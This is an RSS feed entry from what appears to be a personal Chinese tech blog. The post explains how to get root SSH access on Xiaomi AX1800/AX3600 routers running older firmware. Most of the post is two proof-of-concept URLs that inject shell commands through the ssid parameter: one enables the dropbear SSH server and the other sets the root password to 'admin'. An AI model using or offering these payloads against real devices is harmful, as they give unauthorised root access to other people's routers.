<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Ax1800 on Lutong's Homepage</title><link>https://www.elliot98.top/tags/ax1800/</link><description>Recent content in Ax1800 on Lutong's Homepage</description><generator>Hugo</generator><language>zh-cn</language><lastBuildDate>Wed, 31 Mar 2021 22:19:21 +0800</lastBuildDate><atom:link href="https://www.elliot98.top/tags/ax1800/index.xml" rel="self" type="application/rss+xml"/><item><title>AX1800 AX3600 漏洞利用及启动SSH方法</title><link>https://www.elliot98.top/post/tech/ax1800-3600-ssh/</link><pubDate>Wed, 31 Mar 2021 22:19:21 +0800</pubDate><guid>https://www.elliot98.top/post/tech/ax1800-3600-ssh/</guid><description>&lt;p&gt;&lt;strong&gt;证实，1.0.385 及以上固件封堵了这个漏洞。如需使用 SSH，请使用1.0.365 固件版本&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;具体原理请参见：&lt;a href="https://www.right.com.cn/forum/forum.php?mod=viewthread&amp;amp;tid=4032490&amp;amp;extra=page%3D1%26filter%3Dtypeid%26typeid%3D44"&gt;原始论坛&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;下面放上POC用于备忘，具体使用时需要替换STOK：&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;http://192.168.31.1/cgi-bin/luci/;stok=&amp;lt;STOK&amp;gt;/api/misystem/set_config_iotdev?bssid=Xiaomi&amp;amp;user_id=longdike&amp;amp;ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20&amp;#39;s%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg&amp;#39;%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;改密码为 Admin：&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;http://192.168.31.1/cgi-bin/luci/;stok=&amp;lt;STOK&amp;gt;/api/misystem/set_config_iotdev?bssid=Xiaomi&amp;amp;user_id=longdike&amp;amp;ssid=-h%3B%20echo%20-e%20&amp;#39;admin%5Cnadmin&amp;#39;%20%7C%20passwd%20root%3B
&lt;/code&gt;&lt;/pre&gt;</description></item></channel></rss>